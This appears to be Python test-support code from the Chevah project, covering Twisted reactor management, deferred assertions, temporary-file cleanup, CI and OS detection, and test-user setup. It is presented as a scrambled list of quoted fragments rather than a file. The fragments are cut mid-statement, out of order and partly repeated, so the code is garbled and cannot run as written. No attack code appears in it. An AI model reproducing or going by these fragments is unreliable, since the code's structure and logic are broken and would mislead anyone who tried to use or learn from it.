folder_segments. Return a list of members", "'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume", "(reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks = True continue #", "errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files or folders", "its callback chain and the last callback or errback returned", "second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first,", "chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from", "Remove / re-route this code after upgrading to Twisted 13", "calls. have_callbacks = True break # No need to look", "executing the reactor. \"\"\" self._timeout_reached = True failure = AssertionError(", "= True break # No need to look for other", "'utf-8', errors='replace'))) else: return result[0] def assertNoResult(self, deferred): \"\"\" Assert", "is enabled with iterate using a small delay in steps,", "calls which should not be considered as # required to", "'nt': parts = platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1]) #", "msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for first_element,", "failure. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred =", "self._timeout_reached = False self._reactor_timeout_failure = None @property def _caller_success_member(self): \"\"\"", "\"\"\" if not reactor.threadpool: return [] result = [] while", "took more than %s' % (timeout,)) def executeReactorUntil( self, callable,", "failure) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure", "cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar)", "if ( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop:", "steps required to initiate a reactor for testing. \"\"\" self._timeout_reached", "#: User will be created before running the test case", "without stopping it. \"\"\" iterations = [False] * (count -", "debug=False, prevent_stop=False): \"\"\" Run the deferred and return the failure.", "now in Unix zone. os_name = os.uname()[0].lower() if os_name ==", "removeAll might fail since it detects that internal state #", "and the the exception wrapped by the failure result is", "not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a failure.') def", "Signal an timeout error while executing the reactor. \"\"\" self._timeout_reached", "case for Twisted specific code. Provides support for running deferred", "deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise AssertionError( 'Deferred", "are in the queues. Set run_once=True to only run the", "second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys", "is_exception = True if not is_exception: # No need to", "deferred and start/stop the reactor during tests. \"\"\" # Number", "reactor shutdown for not being handled. \"\"\" deferred.addErrback(lambda failure: None)", "os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() ==", "to use one of the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol", "_get_hostname() Bunch = Bunch Mock = Mock #: Obsolete. Please", "result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([ '.'.join((t.__module__, t.__name__)) for t", "%s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else:", "is the `nt` followed by the major and minor NT", "code. reactor.iterate() # Set flag to fake a clean reactor.", "very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at", "the deferred. It transforms an failure into result `None` so", "\"\"\" base = platform.processor() if base == 'aarch64': return 'arm64'", "expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected on %r, \"", "'') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true':", "runner. This is only called when we run with -v", "temp folder and return its path and segments, which is", "self.fail( \"Failure result expected on %r, found no result instead\"", "ignoreFailure(self, deferred): \"\"\" Ignore the current failure on the deferred.", "\"\"\" On non-Linux this is just the os_name. On Linux", "Might be canceled from the separate thread. # AttributeError can", "Does the actual deferred execution. \"\"\" if not deferred.called: deferred_done", "\"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments)", "_cleanReactor(cls): \"\"\" Remove all delayed calls, readers and writers from", "use `getDeferredFailure` or `getDeferredResult`. Run the deferred in the reactor", "be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure", "the change to get a \"root\" deferred. In most tests", "# Windows XP reports value in bytes, instead of Kilobytes.", "list of members which were removed. \"\"\" if not mk.fs.exists(folder_segments):", "Chevah tests. Checks that temporary folder is clean at exit.", "in the default temp folder and mark it for cleanup.", "of `expected_type` \"\"\" # In Python 2.7 isInstance is already", "case and removed on #: teardown. CREATE_TEST_USER = None @classmethod", "L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and it", "Patch = patch _environ_user = None _drop_user = '-' def", "if prevent_stop: # Don't continue with stop procedure. return #", "The result of C{deferred}. \"\"\" # FIXME:1370: # Remove /", "has a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has", "[second[key] for key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values,", "stop it at the end. \"\"\" iterations = [False] *", "# privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest exception.'''", "if not delayed.func: # Was already called. continue delayed_str =", "= process_capabilities.os_family os_version = _get_os_version() cpu_type = process_capabilities.cpu_type ci_name =", "deferred from chained callbacks. result = deferred.result while isinstance(result, Deferred):", "callbacks. result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug)", "a failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if", "of C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove /", "brink.sh script. \"\"\" base = platform.processor() if base == 'aarch64':", "= _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') #", "at an # interval of at most 1 second. if", "be canceled from the separate thread. # AttributeError can occur", "`getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol", "def tempFile(self, content='', prefix='', suffix='', cleanup=True): \"\"\" Return (path, segments)", "errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If", "have the change to get a \"root\" deferred. In most", "= True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks =", "at this point. If the assertion succeeds, then the result", "%s\\n' u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool", "changing the reactor. from twisted.internet import reactor except ImportError: reactor", "errors='replace'))) else: return result[0] def assertNoResult(self, deferred): \"\"\" Assert that", "is OK for thread to exist after test is done.", "the testing environment. \"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user", "expected on %r, \" \"found failure result instead:\\n%s\" % (", "if 'LOGNAME' in os.environ and 'USER' not in os.environ: os.environ['USER']", "already know that we need # to wait at least", "or t2 > 1: t2 = 0.1 t = reactor.running", "running deferred and start/stop the reactor during tests. \"\"\" #", "self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred):", "in reactor.getReaders(): excepted = False for reader_type in self.EXCEPTED_READERS: if", "result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been", "# List of names for delayed calls which should not", "segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create a new", "from six import text_type from six.moves import range import contextlib", "time from bunch import Bunch from mock import patch, Mock", "no more delayed calls, readers or writers or threads are", "bunch import Bunch from mock import patch, Mock from nose", "= drop_user if 'LOGNAME' in os.environ and 'USER' not in", "If the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a success result,", "run. if reactor._started: return reactor._startedBefore = False reactor._started = False", "Don't continue with stop procedure. return # Let the reactor", "We stop the reactor on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls", "self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname(): \"\"\" Return the", "was not stopped, so stop it before raising the error.", "= os.uname()[0].lower() if os_name == 'darwin': parts = platform.mac_ver()[0].split('.') return", "initiate a reactor for testing. \"\"\" self._timeout_reached = False #", "kilo bytes. \"\"\" if cls.os_family == 'posix': import resource return", "deferred to have a result. DEFERRED_TIMEOUT = 1 # List", "of partial thread names to ignore during the tearDown. #", "instead\" % ( deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success result", "mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean,", "_CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List of partial thread", "def dropPrivileges(cls): '''Drop privileges to normal users.''' if cls._drop_user ==", "unicode for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase,", "result (%r) instead\" % (deferred, result[0])) elif (expectedExceptionTypes and not", "not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in os.environ", "second, msg=None): \"\"\" Update to stdlib to make sure we", "prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): \"\"\" Return a string representation", "\"\"\" # Number of second to wait for a deferred", "as context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self, first, second,", "isinstance(second, text_type) ): # noqa:cover if not msg: msg =", "self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self, first, second, msg=None): \"\"\"", "self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None: self._reactor_timeout_failure = None #", "@staticmethod def getHostname(): \"\"\" Return the hostname of the current", "deferred was called. \"\"\" if not deferred.called: raise AssertionError('This deferred", "inspect.isclass(expected_type): expected_type, value = value, expected_type if not isinstance(value, expected_type):", "call. \"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '')", "used for Chevah project. \"\"\" from __future__ import print_function from", "not stopped, so stop it before raising the error. self._shutdownTestReactor()", "_: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False):", "raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a success", "(timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\" Run", "- if provided, and the the exception wrapped by the", "'arch': # Arch has no version. return 'arch' if distro_name", "Wrapper around the stdlib call to allow non-context usage. \"\"\"", "(distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the CPU type as", "_: time.time() - start > duration, timeout=duration + 0.1, debug=debug,", "only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean all test", "failure, the self.fail below will # report it, so swallow", "timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls =", "delayed calls. for delayed in reactor.getDelayedCalls(): # We skip our", "deferred. It transforms an failure into result `None` so that", "chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import", "temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\"", "super user, # we use super filesystem for cleaning. if", "deferred which will be removed only at the end of", "reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start the reactor if", "See LICENSE for details. \"\"\" TestCase used for Chevah project.", "for very high level integration code, where you don't have", "def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments,", "from pool, or empty when threadpool does not exists or", "return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname(): \"\"\"", "= False reactor._justStopped = False reactor.running = False # Start", "function, *args, **kwargs): \"\"\" Overwrite unit-test behaviour to run cleanup", "at shutdown, only if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally:", "not result: self.fail( \"Failure result expected on %r, found no", "(errors,)) def _isExceptedThread(self, name): \"\"\" Return `True` if is OK", "False self._reactor_timeout_failure = None @property def _caller_success_member(self): \"\"\" Retrieve the", "temp_avatar = SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar)", "continue delayed_str = self._getDelayedCallName(delayed) is_exception = False for excepted_callback in", "steps, # to have a much better debug output. #", "home folder path. if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass()", "run_once: if have_callbacks: raise AssertionError( 'Reactor queue still contains delayed", "continue for reader in reactor.getReaders(): have_callbacks = True for excepted_reader", "\"\"\" Return maximum memory usage in kilo bytes. \"\"\" if", "False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached:", "procedure. return # Let the reactor know that we want", "os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() ==", "OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests that need a dedicated", "reactor for `duration` seconds.. \"\"\" start = time.time() self.executeReactorUntil( lambda", "' 'beside the main thread: %s - %s' % (", "stack, since first stack is the # current stack and", "= _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List of partial", "that deferred was called. \"\"\" if not deferred.called: raise AssertionError('This", "test # case itself which run in one tread and", "we need # to restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning)", "new file created in temp which is auto cleaned. \"\"\"", "of a test reactor run. When prevent_stop=True, the reactor will", "self).setUp() self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors = []", "duration=1, debug=False): \"\"\" Iterate the reactor for `duration` seconds.. \"\"\"", "In most tests you would like to use one of", "def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if len(threads) >", "peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP reports value", "file in the default temp folder and mark it for", "False reactor.running = False # Start running has consumed the", "\"\"\" if not mk.fs.exists(folder_segments): return [] # In case we", "None # We search starting with second stack, since first", "import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure", "%r, \" \"found failure result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode(", "assume that hostname does not change during test and this", "DNS resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case", "self.fail below will # report it, so swallow it in", "segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments,", "starting with second stack, since first stack is the #", "@rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove / re-route this", "find the home folder path. if not process_capabilities.get_home_folder: raise cls.skipTest()", "be created before running the test case and removed on", "# Let the reactor run one more time to execute", "threads, ' 'beside the main thread: %s - %s' %", "of the CI on which the tests are currently executed.", "spin the reactor. # To not slow down all the", "False reactor._justStopped = False reactor.running = False # Start running", "# Look at delayed calls. for delayed in reactor.getDelayedCalls(): #", "the deferred deferred.addErrback(lambda _: None) self.fail( \"No result expected on", "the reactor loop. Starts the reactor, waits for deferred execution,", "%r instead: %s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8',", "= mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False):", "= failure def _initiateTestReactor(self, timeout): \"\"\" Do the steps required", "if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still active threads, '", "self.__cleanup__ = [] def exitCleanup(self): \"\"\" To be called at", "members which were removed. \"\"\" if not mk.fs.exists(folder_segments): return []", "def folderInTemp(self, *args, **kwargs): \"\"\" Create a folder in the", "else: # FIXME:4428: # When not executed in debug mode,", "1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run", "\"\"\" Return (path, segments) for a new file created in", "process_capabilities.os_family os_version = _get_os_version() cpu_type = process_capabilities.cpu_type ci_name = _get_ci_name()", "res deferred.addBoth(cb) if result: # If there is already a", "self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call)", "cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self,", "opened_file.write(content) finally: opened_file.close() return (path, segments) def tempFolder(self, name=None, prefix='',", "yet but which will be automatically removed. \"\"\" return mk.fs.pathInTemp(", "stopped, so stop it before raising the error. self._shutdownTestReactor() raise", "not change during test and this # should save a", "raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def", "removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.')", "folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members", "os_name = process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type", "from unittest2 import TestCase # Shut up you linter. TestCase", "self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self,", "AssertionError('Failed to find \"success\" attribute.') return success_state @staticmethod def patch(*args,", "if self._timeout_reached: raise AssertionError( 'Deferred took more than %d to", "iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\" Iterate", "user def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only to clean", "TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem # For Python below", "calls, readers or writers. This should only be called at", "tearDown(self): try: if self._caller_success_member: # Check for a clean reactor", "for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def", "<NAME>. # See LICENSE for details. \"\"\" TestCase used for", "will never be called. \"\"\" if not reactor.threadpool: return []", "delay in steps, # to have a much better debug", "No need to look for other things as we already", "finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that no temporary files", "has been called on it and it has reached the", "This is only for cleanup purpose and should not be", "zone. os_name = os.uname()[0].lower() if os_name == 'darwin': parts =", "return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception", "raised at reactor shutdown for not being handled. \"\"\" deferred.addErrback(lambda", "if source not in target: message = u'%s not in", "function, args, kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception", "at the end. \"\"\" iterations = [False] * (count -", "patch _environ_user = None _drop_user = '-' def setUp(self): super(ChevahTestCase,", "% ( deferred, result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False,", "test suite as super user, # we use super filesystem", "segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments)", "until no more delayed calls are scheduled. This will wait", "delayed_str = self._getDelayedCallName(delayed) is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS:", "a failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been", "> 1: for thread in threads: thread_name = thread.getName() if", "so we need # to restore them. reactor.addSystemEventTrigger( 'during', 'startup',", "== 'arch': # Arch has no version. return 'arch' if", "[] def exitCleanup(self): \"\"\" To be called at the end", "`getDeferredFailure` or `getDeferredResult`. Run the deferred in the reactor loop.", "( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover \"\"\" The short description", "\"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if debug: # noqa:cover", "path which is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix)", "for a new file created in temp which is auto", "disable timeout. if ( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel()", "\"\"\" if not deferred.called: deferred_done = False while not deferred_done:", "and the first failure is raised. \"\"\" for function, args,", "errors = [] for check in checks: try: check() except", "Python 2.7. if sys.version_info[0:2] < (2, 7): from unittest2 import", "run_once=False): \"\"\" Run reactor until no more delayed calls, readers", "it detects that internal state # is changed from other", "if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls):", "**kwargs) def now(self): \"\"\" Return current Unix timestamp. \"\"\" return", "raw_name.replace('<bound method ', '') return raw_name.split(' ', 1)[0] def getDeferredFailure(", "os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase,", "a much better debug output. # Otherwise the debug messages", "self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover", "# FIXME:922: # Move all filesystem checks into a specialized", "in target: message = u'%s not in %s.' % (repr(source),", "def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only to clean the", "deferred. _reactor_timeout_call = None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached =", "# should save a few DNS queries. hostname = _get_hostname()", "bytes, instead of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not", "_caller_success_member(self): \"\"\" Retrieve the 'success' member from the None test", "suite as super user, # we use super filesystem for", "from reactor queue. \"\"\" result = [] for delayed in", "of thread Pool, or [] when threadpool does not exists.", "from temporary folder. Return a list of members which were", "segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all file-system", "\" \"found success result (%r) instead\" % (deferred, result[0])) elif", "assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg,", "have a result at this point. If the assertion succeeds,", "not deferred.called: deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done", "try: success_state = level[0].f_locals['success'] break except KeyError: success_state = None", "self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\" Overwrite", "name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls):", "try: if self._caller_success_member: # Check for a clean reactor at", "so that the failure will not be raised at reactor", "class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case for Chevah tests. Checks", "L{Deferred<twisted.internet.defer.Deferred>} has no result or has a failure result. @return:", "path. if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user =", "continue if not delayed.func: # Was already called. continue delayed_str", "def _get_hostname(): \"\"\" Return hostname as resolved by default DNS", "while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False #", "self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string representation of all", "return context.exception def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual(", "in self.excepted_threads: if name in exception: return True if exception", "unit-test behaviour to run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function,", "'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test", "timeout): \"\"\" Do the steps required to initiate a reactor", "called on it and it has reached the end of", "if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [", "\"\"\" Run the deferred and return the result. Usage:: checker", "in inspect.stack()[1:]: try: success_state = level[0].f_locals['success'] break except KeyError: success_state", "os.getenv('TEST_LANG', 'EN') # List of partial thread names to ignore", "buffers: if len(reactor.getWriters()) > 0: have_callbacks = True continue for", "t2 is None or t2 > 1: t2 = 0.1", "temporary folder. Return a list of members which were removed.", "the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result.", "%r, found %r instead\" % ( deferred, result[0])) def getDeferredResult(", "u'%s not in %s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def", "return raw_name.split(' ', 1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False,", "result.append(res) return res deferred.addBoth(cb) if result: # If there is", "Raise assertion error if deferred is a Failure. The failed", "C{deferred} does not have a result at this point. If", "os_name == 'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0],", "waits for deferred execution, raises error in timeout, stops the", "%s, but got %s. %s\" % ( expected_type, type(value), msg))", "reactor.getDelayedCalls(): # We skip our own timeout call. if delayed", "result = deferred.result def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run", "the home folder path. if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase,", "= checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred,", "if cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar() else: temp_avatar =", "TestCase try: # Import reactor last in case some other", "privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest exception.''' return", "return [] else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working", "integration code, where you don't have the change to get", "threadpool does not exists or has no job. \"\"\" if", "case itself which run in one tread and from the", "import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self):", "ci_name = _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN')", "deferred, result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\"", "self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise AssertionError( 'Deferred took", "debug): \"\"\" Does the actual deferred execution. \"\"\" if not", "return 'osx-%s.%s' % (parts[0], parts[1]) if os_name == 'sunos': parts", "to fake a clean reactor. reactor._startedBefore = False reactor._started =", "= [] def exitCleanup(self): \"\"\" To be called at the", "run with -v or we show the error. \"\"\" class_name", "prevent_stop=True): \"\"\" Run the reactor until callable returns `True`. \"\"\"", "type as used in the brink.sh script. \"\"\" base =", "timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all", "the name of the CI on which the tests are", "to wait for them when running the reactor. EXCEPTED_DELAYED_CALLS =", "@property def _caller_success_member(self): \"\"\" Retrieve the 'success' member from the", "\"\"\" self._timeout_reached = True failure = AssertionError( 'Reactor took more", "testing we want to force to reactor to wake at", "1 second. if t2 is None or t2 > 1:", "in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred( self, deferred,", "the `nt` followed by the major and minor NT version.", "self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ]", "it to True to enter the first loop. have_callbacks =", "(error)) def _get_os_version(): \"\"\" On non-Linux this is just the", "they # will not spin the reactor. # To not", "# When running threads tests the reactor touched from the", "else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the", "success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper for generic patching.", "= Mock #: Obsolete. Please use self.patch and self.patchObject. Patch", "= int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP reports value in", "fail as they # will not spin the reactor. #", "use one of the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol =", "in Python 2.7. if sys.version_info[0:2] < (2, 7): from unittest2", "a few DNS queries. hostname = _get_hostname() Bunch = Bunch", "reactor. reactor._startedBefore = False reactor._started = False reactor._justStopped = False", "%s' % ( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors =", "noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files or folders left over.\\n", "\"found failure result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace')))", "'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS", "self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def executeReactor(self, timeout=None, debug=False,", "if exception in name: return True return False def addCleanup(self,", "Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt': parts", "self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate()", "test case.''' success_state = None # We search starting with", "is not clean. %s: %s' % (location, reason)) if reactor._started:", "break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None: self._reactor_timeout_failure = None", "name: return True return False def addCleanup(self, function, *args, **kwargs):", "calls, in case the original deferred returns another deferred. Usage::", "\"\"\" Run the reactor until no more delayed calls are", "a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been", "the version of the underlying Darwin OS. See: 